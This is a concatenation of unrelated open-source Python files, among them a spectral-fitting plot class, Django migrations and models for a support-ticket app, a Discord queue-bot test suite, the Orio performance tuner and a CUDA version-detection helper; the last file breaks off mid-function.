cax.text(1.25, 0.0, '{:.1f}'.format(vmin), fontsize=9, transform=cax.transAxes, va='center', ha='left')
cax.text(1.25, 1.0, '{:.1f}'.format(vmax), fontsize=9, transform=cax.transAxes, va='center', ha='left')
boxlines = []
clkpnts = []
for idx, ax in enumerate(axs[:2]):
if idx == 0:
c = 'g'
elif idx == 1:
c = 'b'
else:
c = 'k'
line, = ax.plot([], [], '-', c=c, alpha=1.0) # empty line
boxlines.append(line)
clkpnt, = ax.plot([], [], '+', c='white', alpha=0.7) # empty line
clkpnts.append(clkpnt)
if ntim < 2:
cplts = ['k']
else:
cplts = tcmap(np.linspace(0, 1, ntim))
self.cplts = cplts
self.ax_eospec = axs[-1]
errobjs = initspecplot(self.ax_eospec, cplts)
grids.tight_layout(fig)
self.region = RegionSelector(clkpnts, boxlines, eofiles, errobjs, cfreqs=cfreqs, rms=None, wTmap=None)
self.scatter_eospecs_fit = []
self.scatter_eospecs = []
def set_params(self, params):
ssz = self.region.area # source area in arcsec^2
params.add('ssz', value=ssz, vary=False) # pixel size in arcsec^2
self.params = params
def plot_components(self):
ti = 0
tb = self.region.errobjs[ti][0].get_ydata() * 1e6
tb_ma = ma.masked_less_equal(tb, 0)
freqghz = self.region.errobjs[0][0].get_xdata()
# freqghz_ma = ma.masked_outside(freqghz, 1.0, 15.0)
freqghz_ma = ma.masked_outside(freqghz, self.freqghz_bound[0], self.freqghz_bound[1])
mask_fit = np.logical_or(freqghz_ma.mask, tb_ma.mask)
freqghz_ma = ma.masked_array(freqghz, mask_fit)
tb_ma = ma.masked_array(tb, mask_fit)
# scatter_eospecs_fit.append(
# ax_spec.plot(freqghz_ma, tb_ma / 1.e6, marker='o', linestyle='', c=cplts[ti]))
# flx_rms = rms
tb_err = tb * 0.0
tb_err[:] = 1.e6
tb_err_ma = ma.masked_array(tb_err, tb_ma.mask)
if len(self.scatter_eospecs_fit) == 0:
for ti, cplt in enumerate(self.cplts):
self.scatter_eospecs_fit.append(
self.ax_eospec.errorbar(freqghz_ma, tb_ma / 1.e6, yerr=tb_err_ma / 1.e6, marker='.', ms=1,
linestyle='',
c=cplt))
else:
for ti, cplt in enumerate(self.cplts):
set_errorobj(freqghz_ma, tb_ma / 1.e6, self.scatter_eospecs_fit[ti], yerr=tb_err_ma / 1.e6)
def fit(self):
ti = 0
tb = self.region.errobjs[ti][0].get_ydata() * 1e6
tb_ma = ma.masked_less_equal(tb, 0)
freqghz = self.region.errobjs[0][0].get_xdata()
# freqghz_ma = ma.masked_outside(freqghz, 1.0, 15.0)
freqghz_ma = ma.masked_outside(freqghz, self.freqghz_bound[0], self.freqghz_bound[1])
mask_fit = np.logical_or(freqghz_ma.mask, tb_ma.mask)
freqghz_ma = ma.masked_array(freqghz, mask_fit)
tb_ma = ma.masked_array(tb, mask_fit)
# scatter_eospecs_fit.append(
# ax_spec.plot(freqghz_ma, tb_ma / 1.e6, marker='o', linestyle='', c=cplts[ti]))
# flx_rms = rms
tb_err = tb * 0.1
# tb_err[:] = 0.2e6
tb_err_ma = ma.masked_array(tb_err, tb_ma.mask)
if len(self.scatter_eospecs_fit) == 0:
for ti, cplt in enumerate(self.cplts):
self.scatter_eospecs_fit.append(
self.ax_eospec.errorbar(freqghz_ma, tb_ma / 1.e6, yerr=tb_err_ma / 1.e6, marker='.', ms=1,
linestyle='', c=cplt))
else:
for ti, cplt in enumerate(self.cplts):
set_errorobj(freqghz_ma, tb_ma / 1.e6, self.scatter_eospecs_fit[ti], yerr=tb_err_ma / 1.e6)
mini = lmfit.Minimizer(mwspec2min_1src, self.params, fcn_args=(freqghz_ma.compressed(),),
fcn_kws={'tb': tb_ma.compressed(), 'tb_err': tb_err_ma.compressed()},
nan_policy='omit')
method = 'nelder'
# # method = 'differential_evolution'
mi = mini.minimize(method=method)
print(method + ' minimization results')
print(lmfit.fit_report(mi.params))
tb_fit = mwspec2min_1src(mi.params, freqghz)
if len(self.scatter_eospecs) == 0:
for ti, cplt in enumerate(self.cplts):
self.scatter_eospecs.append(self.ax_eospec.plot(freqghz, tb_fit / 1.e6, linestyle='-', c=cplt))
else:
for ti, cplt in enumerate(self.cplts):
self.scatter_eospecs[ti][0].set_data(freqghz, tb_fit / 1.e6)
| 1.671875 | 2 |
msgvis/apps/questions/migrations/0001_initial.py | hds-lab/textvis-drg | 10 | 11356 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dimensions', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('year', models.PositiveIntegerField(default=None, null=True, blank=True)),
('authors', models.CharField(default=None, max_length=250, blank=True)),
('link', models.CharField(default=None, max_length=250, blank=True)),
('title', models.CharField(default=None, max_length=250, blank=True)),
('venue', models.CharField(default=None, max_length=250, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField()),
('dimensions', models.ManyToManyField(to='dimensions.Dimension')),
('source', models.ForeignKey(default=None, to='questions.Article', null=True)),
],
options={
},
bases=(models.Model,),
),
]
| 1.820313 | 2 |
test/test_check_alert.py | russ-lewis/cs120-queuebot | 0 | 11357 | import io
import sys
import unittest
import asyncio
import random
from contextlib import redirect_stdout
from .utils import *
from queuebot import QueueBot, QueueConfig, DiscordUser
config = {
"SECRET_TOKEN": "<PASSWORD>",
"TA_ROLES": ["UGTA"],
"LISTEN_CHANNELS": ["join-queue"],
"CHECK_VOICE_WAITING": "False",
"VOICE_WAITING": "waiting-room",
"ALERT_ON_FIRST_JOIN": "True",
"VOICE_OFFICES": ["Office Hours Room 1", "Office Hours Room 2", "Office Hours Room 3"],
"ALERTS_CHANNEL": "queue-alerts",
}
config = QueueConfig(config, test_mode=True)
# TODO Comment each test case
class QueueTest(unittest.TestCase):
def setUp(self):
random.seed(SEED)
self.config = config.copy()
self.bot = QueueBot(self.config, None, testing=True)
# self.bot.waiting_room = MockVoice(config.VOICE_WAITING)
self.bot.logger = MockLogger()
self.bot.office_rooms = [MockVoice(name) for name in config.VOICE_OFFICES]
def reset_vc_queue(self):
# Reset queue
russ = get_rand_element(ALL_TAS)
message = MockMessage("!q clear", russ)
with io.StringIO() as buf, redirect_stdout(buf):
run(self.bot.queue_command(message))
self.assertEqual(len(self.bot._queue), 0)
# Empty voice channels
for v in self.bot.office_rooms:
v.members = []
def test_no_tas(self):
# No TAs in rooms
student = get_rand_element(ALL_STUDENTS)
self.assertEqual(len(self.bot._queue), 0)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", student)
run(self.bot.queue_command(message))
self.assertTrue(buf.getvalue().strip().startswith(
f"SEND: ✅ {student.get_mention()} you have been added at position #1"))
self.assertEqual(len(self.bot._queue), 1)
self.reset_vc_queue()
def test_one_ta(self):
ta = get_rand_element(ALL_TAS)
office_room = get_rand_element(self.bot.office_rooms)
office_room.members.append(ta)
student = get_rand_element(ALL_STUDENTS)
self.assertEqual(len(self.bot._queue), 0)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", student)
run(self.bot.queue_command(message))
self.assertTrue(buf.getvalue().strip().startswith(
f"SEND: {ta.get_mention()} The queue is no longer empty"))
self.assertEqual(len(self.bot._queue), 1)
self.reset_vc_queue()
def get_mentions_from_send(self, buf):
send_str = buf.getvalue().strip().split("\n", 1)[0]
assert send_str.startswith("SEND:")
assert "<@" in send_str
assert "The queue is no longer empty" in send_str
return send_str.lstrip("SEND: ") \
.rstrip(" The queue is no longer empty") \
.split(" ")
def test_many_tas_one_room(self):
tas = get_n_rand(ALL_TAS, 3)
office_room = get_rand_element(self.bot.office_rooms)
office_room.members.extend(tas)
mention_set = set()
student = get_rand_element(ALL_STUDENTS)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", student)
run(self.bot.queue_command(message))
mentions = self.get_mentions_from_send(buf)
mention_set.update(mentions)
for ta in tas:
self.assertTrue(ta.get_mention() in mention_set)
mention_set.remove(ta.get_mention())
self.assertEqual(len(mention_set), 0)
self.reset_vc_queue()
def test_many_tas_all_rooms(self):
tas = get_n_rand(ALL_TAS, 5)
tas_copy = tas.copy()
while len(tas) > 0:
for office_room in self.bot.office_rooms:
# If we run out of TAs while going through all the rooms
if len(tas) == 0:
break
office_room.add_member(tas.pop())
mention_set = set()
student = get_rand_element(ALL_STUDENTS)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", student)
run(self.bot.queue_command(message))
mentions = self.get_mentions_from_send(buf)
mention_set.update(mentions)
for ta in tas_copy:
self.assertTrue(ta.get_mention() in mention_set)
mention_set.remove(ta.get_mention())
self.assertEqual(len(mention_set), 0)
self.reset_vc_queue()
def test_ta_with_student(self):
busy_room, open_room = get_n_rand(self.bot.office_rooms, 2)
busy_ta, open_ta = get_n_rand(ALL_TAS, 2)
busy_student, open_student = get_n_rand(ALL_STUDENTS, 2)
busy_room.add_many_members(busy_ta, busy_student)
open_room.add_member(open_ta)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", busy_student)
run(self.bot.queue_command(message))
mentions = self.get_mentions_from_send(buf)
self.assertEqual(mentions, [open_ta.get_mention()])
def test_ta_with_student2(self):
rooms = get_n_rand(self.bot.office_rooms, 3)
busy_rooms = rooms[:-1]
open_room = rooms[-1]
busy_ta, open_ta = get_n_rand(ALL_TAS, 2)
students = [ None ]
open_student = None
while open_student in students:
students = get_n_rand(ALL_STUDENTS, 5)
open_student = get_rand_element(ALL_STUDENTS)
busy_rooms[0].add_many_members(busy_ta, *students[:-2])
busy_rooms[1].add_many_members(busy_ta, *students[-2:])
open_room.add_member(open_ta)
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", open_student)
run(self.bot.queue_command(message))
mentions = self.get_mentions_from_send(buf)
self.assertEqual(mentions, [open_ta.get_mention()])
def test_two_tas(self):
tas = get_n_rand(ALL_TAS, 2)
rooms = get_n_rand(self.bot.office_rooms, 2)
rooms[0].add_member(tas[0])
rooms[1].add_member(tas[1])
students = get_n_rand(ALL_STUDENTS, 2)
# Check for both alerted
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", students[0])
run(self.bot.queue_command(message))
ta_list = set(self.get_mentions_from_send(buf))
for ta in tas:
ta_list.remove(ta.get_mention())
self.assertEqual(len(ta_list), 0)
# Remove first student from queue
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q next", tas[0])
run(self.bot.queue_command(message))
self.assertEqual(len(self.bot._queue), 0)
# First ta helps first student
rooms[0].add_member(students[0])
# Another student joins
with io.StringIO() as buf, redirect_stdout(buf):
message = MockMessage("!q join", students[1])
run(self.bot.queue_command(message))
ta_list = self.get_mentions_from_send(buf)
self.assertEqual(ta_list, [tas[1].get_mention()])
if __name__ == '__main__':
unittest.main()
| 2.390625 | 2 |
iam/__init__.py | dataday/aws-utilities-sdk | 0 | 11358 | """
.. module:: aws_utilities_cli.iam
:platform: OS X
:synopsis: Small collection of utilities that
use the Amazon Web Services (AWS) SDK
.. moduleauthor:: dataday
"""
__all__ = ['generate_identity', 'generate_policy']
| 1.109375 | 1 |
tests/common/test_run/triangle_run.py | KnowingNothing/akg-test | 0 | 11359 | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from tests.common.tensorio import compare_tensor
from tests.common.test_op import triangle
from akg.utils import kernel_exec as utils
from tests.common.gen_random import random_gaussian
def triangle_execute(shape, const_value, lower, dtype, attrs):
support_type = ['float16', 'float32']
assert dtype in support_type
assert len(shape) <= 2
if attrs is None:
attrs = {'enable_pre_poly_loop_partition': False}
attrs['enable_pre_poly_loop_partition'] = False
attrs['enable_post_poly_loop_partition'] = False
attrs['enable_convert_if'] = True
attrs['enable_double_buffer'] = False
output_shape = shape
if len(shape) == 1:
output_shape = [shape[0], shape[0]]
input, bench_mark = gen_data(shape, output_shape, const_value, lower, dtype)
op_attrs = [const_value, lower]
mod = triangle_compile(shape, dtype, op_attrs, attrs)
source_code = mod.imported_modules[0].get_source()
output = np.full(output_shape, np.nan, dtype)
output = utils.mod_launch(mod, (input, output), expect=bench_mark)
# compare result
compare_result = compare_tensor(output, bench_mark, rtol=5e-3, equal_nan=True)
return input, output, bench_mark, compare_result
def triangle_compile(shape, dtype, op_attrs, attrs):
return utils.op_build_test(triangle.triangle, [shape], [dtype], op_attrs, kernel_name='triangle', attrs=attrs)
def gen_data(shape, output_shape, const_value, lower, dtype):
input = random_gaussian(shape, miu=1, sigma=0.3).astype(dtype)
if len(shape) == 2:
bench_mark = input
else:
bench_mark = np.zeros(output_shape).astype(dtype)
for i in range(output_shape[0]):
bench_mark[i] = input
if lower:
for i in range(output_shape[0]):
bench_mark[i][i + 1:] = const_value
else:
for i in range(output_shape[0]):
bench_mark[i][:i] = const_value
return input, bench_mark
| 1.75 | 2 |
profiles/migrations/0018_auto_20180514_2106.py | brentfraser/geotabloid | 2 | 11360 | <reponame>brentfraser/geotabloid<gh_stars>1-10
# Generated by Django 2.0.3 on 2018-05-14 21:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0017_otherfiles_location'),
]
operations = [
migrations.AlterField(
model_name='project',
name='url',
field=models.FileField(upload_to='projects/'),
),
]
| 1.523438 | 2 |
orio/main/tuner/tuner.py | parsabee/Orio | 24 | 11361 | <reponame>parsabee/Orio
#
# The tuner class to initiate the empirical performance tuning process
#
import re, sys, os
from orio.main.util.globals import *
import orio.main.dyn_loader, orio.main.tspec.tspec, orio.main.tuner.ptest_codegen, orio.main.tuner.ptest_driver
#--------------------------------------------------
# the name of the module containing various search algorithms
SEARCH_MOD_NAME = 'orio.main.tuner.search'
#--------------------------------------------------
class PerfTuner:
'''
The empirical performance tuner.
This class is responsible for invoking the code generators of the annotation modules,
compiling the resulting code, and interfacing with the search interface to run the
tests and collect the results.
'''
#-------------------------------------------------
def __init__(self, odriver):
'''To instantiate an empirical performance tuner object'''
self.odriver = odriver
self.dloader = orio.main.dyn_loader.DynLoader()
self.num_params=0
self.num_configs=0
self.num_bin=0
self.num_int=0
self.tinfo = None
#-------------------------------------------------
def tune(self, module_body_code, line_no, cfrags):
'''
Perform empirical performance tuning on the given annotated code. And return the best
optimized code variant.
'''
# extract the tuning information specified from the given annotation
tinfo = self.__extractTuningInfo(module_body_code, line_no)
self.tinfo = tinfo
# determine if parallel search is required
use_parallel_search = tinfo.batch_cmd != None
# create a performance-testing code generator for each distinct problem size
ptcodegens = []
#timing_code = ''
for prob_size in self.__getProblemSizes(tinfo.iparam_params, tinfo.iparam_constraints):
if self.odriver.lang == 'c':
c = orio.main.tuner.ptest_codegen.PerfTestCodeGen(prob_size, tinfo.ivar_decls, tinfo.ivar_decl_file,
tinfo.ivar_init_file, tinfo.ptest_skeleton_code_file, self.odriver.lang,
tinfo.random_seed, use_parallel_search, tinfo.validation_file)
elif self.odriver.lang == 'cuda':
c = orio.main.tuner.ptest_codegen.PerfTestCodeGenCUDA(prob_size, tinfo.ivar_decls, tinfo.ivar_decl_file,
tinfo.ivar_init_file, tinfo.ptest_skeleton_code_file, self.odriver.lang,
tinfo.random_seed, use_parallel_search)
elif self.odriver.lang == 'opencl':
c = orio.main.tuner.ptest_codegen.PerfTestCodeGenOpenCL(prob_size, tinfo.ivar_decls, tinfo.ivar_decl_file,
tinfo.ivar_init_file, tinfo.ptest_skeleton_code_file, self.odriver.lang,
tinfo.random_seed, use_parallel_search)
elif self.odriver.lang == 'fortran':
c = orio.main.tuner.ptest_codegen.PerfTestCodeGenFortran(prob_size, tinfo.ivar_decls, tinfo.ivar_decl_file,
tinfo.ivar_init_file, tinfo.ptest_skeleton_code_file, self.odriver.lang,
tinfo.random_seed, use_parallel_search)
else:
err('main.tuner.tuner: unknown output language specified: %s' % self.odriver.lang)
ptcodegens.append(c)
# create the performance-testing driver
ptdriver = orio.main.tuner.ptest_driver.PerfTestDriver(self.tinfo, use_parallel_search,
self.odriver.lang,
c.getTimerCode(use_parallel_search))
# get the axis names and axis value ranges to represent the search space
axis_names, axis_val_ranges = self.__buildCoordSystem(tinfo.pparam_params, tinfo.cmdline_params)
info('%s' % axis_names)
info('%s' % axis_val_ranges)
# combine the performance parameter constraints
pparam_constraint = 'True'
for vname, rhs in tinfo.pparam_constraints:
pparam_constraint += ' and (%s)' % rhs
# dynamically load the search engine class and configure it
if Globals().extern:
tinfo.search_algo='Extern'
info('Running in %s mode' % tinfo.search_algo)
info('Using parameters %s' % Globals().config)
class_name = tinfo.search_algo
mod_name = '.'.join([SEARCH_MOD_NAME, class_name.lower(), class_name.lower()])
search_class = self.dloader.loadClass(mod_name, class_name)
# convert the search time limit (from minutes to seconds) and get the total number of
# search runs
search_time_limit = 60 * tinfo.search_time_limit
search_total_runs = tinfo.search_total_runs
search_use_z3 = tinfo.search_use_z3
search_resume = tinfo.search_resume
# get the search-algorithm-specific arguments
search_opts = dict(tinfo.search_opts)
# perform the performance tuning for each distinct problem size
optimized_code_seq = []
for ptcodegen in ptcodegens:
if Globals().verbose:
info('\n----- begin empirical tuning for problem size -----')
# Sort y variable name... not sure it's really necessary
iparams = sorted(ptcodegen.input_params[:])
for pname, pvalue in iparams:
info(' %s = %s' % (pname, pvalue))
iparams = sorted(ptcodegen.input_params[:])
for pname, pvalue in iparams:
Globals().metadata['size_' + pname] = pvalue
debug(ptcodegen.input_params[:])
# create the search engine
search_eng = search_class({'cfrags':cfrags, # code versions
'axis_names':axis_names, # performance parameter names
'axis_val_ranges':axis_val_ranges, # performance parameter values
'pparam_constraint':pparam_constraint,
'search_time_limit':search_time_limit,
'search_total_runs':search_total_runs,
'search_resume':search_resume,
'search_opts':search_opts,
'ptcodegen':ptcodegen,
'ptdriver':ptdriver, 'odriver':self.odriver,
'use_parallel_search':use_parallel_search,
'input_params':ptcodegen.input_params[:]})
# search for the best performance parameters
best_perf_params, best_perf_cost = search_eng.search()
# output the best performance parameters
if Globals().verbose and not Globals().extern:
info('----- the obtained best performance parameters -----')
pparams = sorted(list(best_perf_params.items()))
for pname, pvalue in pparams:
info(' %s = %s' % (pname, pvalue))
# generate the optimized code using the obtained best performance parameters
if Globals().extern:
best_perf_params=Globals().config
debug("[orio.main.tuner.tuner] Globals config: %s" % str(Globals().config), obj=self, level=6)
cur_optimized_code_seq = self.odriver.optimizeCodeFrags(cfrags, best_perf_params)
# check the optimized code sequence
if len(cur_optimized_code_seq) != 1:
err('orio.main.tuner internal error: the empirically optimized code cannot contain multiple versions')
# get the optimized code
optimized_code, _, externals = cur_optimized_code_seq[0]
# insert comments into the optimized code to include information about
# the best performance parameters and the input problem sizes
iproblem_code = ''
iparams = sorted(ptcodegen.input_params[:])
for pname, pvalue in iparams:
if pname == '__builtins__':
continue
iproblem_code += ' %s = %s \n' % (pname, pvalue)
pparam_code = ''
pparams = sorted(list(best_perf_params.items()))
for pname, pvalue in pparams:
if pname == '__builtins__':
continue
pparam_code += ' %s = %s \n' % (pname, pvalue)
info_code = '\n/**-- (Generated by Orio) \n'
if not Globals().extern:
info_code += 'Best performance cost: \n'
info_code += ' %s \n' % best_perf_cost
info_code += 'Tuned for specific problem sizes: \n'
info_code += iproblem_code
info_code += 'Best performance parameters: \n'
info_code += pparam_code
info_code += '--**/\n'
optimized_code = info_code + optimized_code
# store the optimized for this problem size
optimized_code_seq.append((optimized_code, ptcodegen.input_params[:], externals))
# return the optimized code
return optimized_code_seq
# Private methods
#-------------------------------------------------
def __extractTuningInfo(self, code, line_no):
'''Extract tuning information from the given annotation code'''
# parse the code
match_obj = re.match(r'^\s*import\s+spec\s+([/A-Za-z_]+);\s*$', code)
# if the code contains a single import statement
if match_obj:
# get the specification name
spec_name = match_obj.group(1)
spec_file = spec_name+'.spec'
try:
src_dir = '/'.join(list(Globals().src_filenames.keys())[0].split('/')[:-1])
spec_file_path = os.getcwd() + '/' + src_dir + '/' + spec_file
f = open(spec_file_path, 'r')
tspec_code = f.read()
f.close()
except:
err('%s: cannot open file for reading: %s' % (self.__class__, spec_file_path))
tuning_spec_dict = orio.main.tspec.tspec.TSpec().parseProgram(tspec_code)
# if the tuning specification is hardcoded into the given code
elif code.lstrip().startswith('spec'):
tuning_spec_dict = orio.main.tspec.tspec.TSpec().parseProgram(code)
else:
# parse the specification code to get the tuning information
tuning_spec_dict = orio.main.tspec.tspec.TSpec().parseSpec(code, line_no)
# return the tuning information
return tuning_spec_dict
#-------------------------------------------------
def __listAllCombinations(self, seqs):
'''
Enumerate all combinations of the given sequences.
e.g. input: [['a','b'],[1,2]] --> [['a',1],['a',2],['b',1],['b',2]]
'''
# the base case
if len(seqs) == 0:
return []
# the recursive step
trailing_combs = self.__listAllCombinations(seqs[1:])
if trailing_combs == []:
trailing_combs = [[]]
combs = []
for i in seqs[0]:
for c in trailing_combs:
combs.append([i] + c)
# return the combinations
return combs
#-------------------------------------------------
def __getProblemSizes(self, iparam_params, iparam_constraints):
'''Return all valid problem sizes'''
# combine the input parameter constraints
iparam_constraint = 'True'
for vname, rhs in iparam_constraints:
iparam_constraint += ' and (%s)' % rhs
# compute all possible combinations of problem sizes
prob_sizes = []
pnames, pvalss = list(zip(*iparam_params))
for pvals in self.__listAllCombinations(pvalss):
prob_sizes.append(list(zip(pnames, pvals)))
# exclude all invalid problem sizes
n_prob_sizes = []
for p in prob_sizes:
try:
is_valid = eval(iparam_constraint, dict(p))
except Exception as e:
err('orio.main.tuner.tuner:%s: failed to evaluate the input parameter constraint expression\n --> %s: %s' % (iparam_constraint,e.__class__.__name__, e))
if is_valid:
n_prob_sizes.append(p)
prob_sizes = n_prob_sizes
# check if the new problem sizes is empty
if len(prob_sizes) == 0:
err('orio.main.tuner.tuner: no valid problem sizes exist. please check the input parameter ' +
'constraints')
# return all possible combinations of problem sizes
return prob_sizes
#-------------------------------------------------
def __buildCoordSystem(self, perf_params, cmdline_params):
'''Return information about the coordinate systems that represent the search space'''
debug("BUILDING COORD SYSTEM", obj=self,level=3)
# get the axis names and axis value ranges
axis_names = []
axis_val_ranges = []
for pname, prange in perf_params:
axis_names.append(pname)
# BN: why on earth would someone do this?????
# axis_val_ranges.append(self.__sort(prange))
axis_val_ranges.append(prange)
for pname, prange in cmdline_params:
axis_names.append('__cmdline_' + pname)
axis_val_ranges.append(prange)
self.num_params=len(axis_names)
self.num_configs=1
self.num_bin=0
self.num_categorical = 0
self.num_int=self.num_params
ptype=[]
for vals in axis_val_ranges:
self.num_configs=self.num_configs*len(vals)
ptype.append('I')
if type(vals[0]) == bool:
self.num_bin=self.num_bin+1
ptype[len(ptype)-1]=('B')
if type(vals[0]) == str:
self.num_categorical = self.num_categorical+1
self.num_int -= self.num_bin
self.num_int -= self.num_categorical
info('Search_Space = %1.3e' % self.num_configs)
info('Number_of_Parameters = %02d' % self.num_params)
info('Numeric_Parameters = %02d' % self.num_int)
info('Binary_Parameters = %02d' % self.num_bin)
info('Categorical_Parameters = %02d' % self.num_categorical)
sys.stderr.write('%s\n'% Globals().configfile)
return (axis_names, axis_val_ranges)
| 2.671875 | 3 |
verify_data.py | goowell/DrAdvice | 0 | 11362 | from transformer import *
from logger import logger
def find_missing():
from db import paients_source, paients_info
import re
for pi in paients_info.find():
if paients_source.find({'_id': re.compile(pi['住院号'], re.IGNORECASE)}).count()>0:
pass
else:
print(pi['住院号'])
def verify_data(collection):
'verify the data format is correct or not.'
for d in collection.find():
info = d.get('d').get('info')
if len(info) <12 and info[0] != '1':
logger.error('invalid patient info:' + d['_id']+str(info))
if len(d.get('d').get('doctor_advice')) == 0:
logger.error('invalid doctor advice:' + d['_id'])
else:
has_long = False
has_short = False
for a in d.get('d').get('doctor_advice'):
if len(a) != 18:
logger.error('invalid doctor advice:' + d['_id'])
logger.error("invalid doctor advice: " + a)
if a[3] == '长':
has_long = True
else:
has_short = True
if not (has_long and has_short):
logger.error('invalid doctor advice: ' + d['_id'] + ', long/short: {}/{}'.format(has_long, has_short) )
def get_info(collection):
'count PE'
for d in collection.find():
if len(d.get('d').get('doctor_advice')) == 0:
print('invalid doctor advice:' + d['_id'])
else:
one_p = split_all_ad(d)
print(one_p)
break
def main():
'main entry'
from datetime import datetime
from db import paients_source
start = datetime.now()
print('hello..')
# verify_data(paients_source)
# get_info(collection)
find_missing()
print(datetime.now() - start)
if __name__ == '__main__':
main() | 2.671875 | 3 |
jvm-packages/cudautils.py | NVIDIA/spark-xgboost | 15 | 11363 | #!/usr/bin/env python
import os
import re
import subprocess
import sys
# version -> classifier
# '' means default classifier
cuda_vers = {
'11.2': ['cuda11', '']
}
def check_classifier(classifier):
'''
Check the mapping from cuda version to jar classifier.
Used by maven build.
'''
cu_ver = detect_cuda_ver()
classifier_list = cuda_vers[cu_ver]
if classifier not in classifier_list:
raise Exception("Jar classifier '{}' mismatches the 'nvcc' version {} !".format(classifier, cu_ver))
def get_classifier():
cu_ver = detect_cuda_ver()
classifier_list = cuda_vers[cu_ver]
return classifier_list[0]
def get_supported_vers():
'''
Get the supported cuda versions.
'''
return cuda_vers.keys()
def get_supported_vers_str():
'''
Get the supported cuda versions and join them as a string.
Used by shell script.
'''
return ' '.join(cuda_vers.keys())
def detect_cuda_ver():
'''
Detect the cuda version from current nvcc tool.
'''
nvcc_ver_bin = subprocess.check_output('nvcc --version', shell=True)
nvcc_ver = re.search('release ([.0-9]+), V([.0-9]+)', str(nvcc_ver_bin)).group(1)
if nvcc_ver in get_supported_vers():
return nvcc_ver
else:
raise Exception("Unsupported cuda version: {}, Please check your 'nvcc' version.".format(nvcc_ver))
def cudaver():
return 'cuda{}'.format(detect_cuda_ver())
if __name__ == "__main__":
num_args = len(sys.argv)
action = sys.argv[1].lower() if num_args > 1 else 'l'
if action =='c':
classifier = sys.argv[2].lower() if num_args > 2 else ''
check_classifier(classifier)
elif action == 'd':
print(detect_cuda_ver())
elif action == 'g':
print(get_classifier())
elif action == 'l':
print(get_supported_vers_str())
else:
print("Unsupported action: " + action)
| 2.5625 | 3 |
hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 0 | 11364 | # Generated by Django 3.0.2 on 2020-03-29 19:11
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('hitchhikeapp', '0010_userdata_userid'),
]
operations = [
migrations.DeleteModel(
name='Dog',
),
]
| 1.59375 | 2 |
support/models.py | gurupratap-matharu/django-tickets-app | 1 | 11365 | <filename>support/models.py
import pytz
from datetime import date, time, datetime, timedelta
from django.core.exceptions import ValidationError
from django.db import models
START_HOUR = 9
END_HOUR = 18
workingHours = END_HOUR - START_HOUR
class Vendor(models.Model):
"""
This class defines which vendors are allowed raise tickets with our system.
"""
vendor = models.CharField(max_length=25)
def __str__(self):
return self.vendor
def no_past(value):
today = date.today()
if value < today:
raise ValidationError('Holiday Date cannot be in the past.')
class Holiday(models.Model):
"""
Define the holiday or non-working days for each based on each region.
"""
day = models.DateField(help_text="Enter the date of Holiday", validators=[no_past])
description = models.CharField(max_length=200, blank=True)
class Meta:
ordering = ('day',)
def __str__(self):
return "{} {}".format(self.day, self.description)
class Category(models.Model):
"""
We define the type of category to which a particular ticket belongs here.
"""
CATEGORY_CHOICES = (
('Website Down', 'Website Down'),
('Problem with WiFi', 'Problem with WiFi'),
('Server Down', 'Server Down'),
('Cannot Login', 'Cannot Login'),
('Critical Bug','Critical Bug'),
('Problem with Billing System','Problem with Billing System'),
)
category = models.CharField(max_length=50, choices=CATEGORY_CHOICES)
class Meta:
verbose_name_plural = "categories"
def __str__(self):
return self.category
class Ticket(models.Model):
"""
Our ticket models objects are created here and stored in the database
as a table with the attributes mentioned below.
"""
SEVERITY_CHOICES = (
(4, 1), # severity 1 to be resolved in 4 hours
(24, 2), # severity 2 to be resolved in 24 hours
(72, 3), # severity 3 to be resolved in 72 hours / 3 days
(168, 4), # severity 4 to be resolved in 168 hours / 7 days
(720, 5), # severity 5 to be resolved in 720 hours / 30 days
)
STATUS_CHOICES = (
('Issued', 'Issued'), # ticket raised but not assigned
('In Process', 'In Process'), # ticket assigned
('Resolved', 'Resolved'), # ticket resolved
('Cancelled', 'Cancelled'),
)
vendor = models.ForeignKey(Vendor, on_delete=models.CASCADE)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
severity = models.PositiveIntegerField(choices=SEVERITY_CHOICES)
description = models.CharField(max_length=255)
status = models.CharField(max_length=20, choices=STATUS_CHOICES, default='Issued')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
expiry = models.DateTimeField(blank=True, null=True)
def save(self, *args, **kwargs):
"""
Here we over-ride the default `save` method to populate the expiry field
based on creation date, holidays and weekends.
"""
self.expiry = findExpiryDate(self.severity)
super().save(*args, **kwargs) # Call the "real" save() method.
def __str__(self):
return "{} | {} | {} ".format(self.vendor.vendor, self.category.category, self.created_at)
def findExpiryDate(sla):
"""
Finds the expiry date for a ticket based on
1. Severity of the ticket
2. Date of issue
"""
now = datetime.now()
flag = 1
# if ticket is received today between 00:00 hours to Start_Hour
# we reset the flag
if now.hour < START_HOUR:
flag = 0
# if ticket is received today between office hours then
# we simply deduct working hours left today from sla
if START_HOUR < now.hour < END_HOUR:
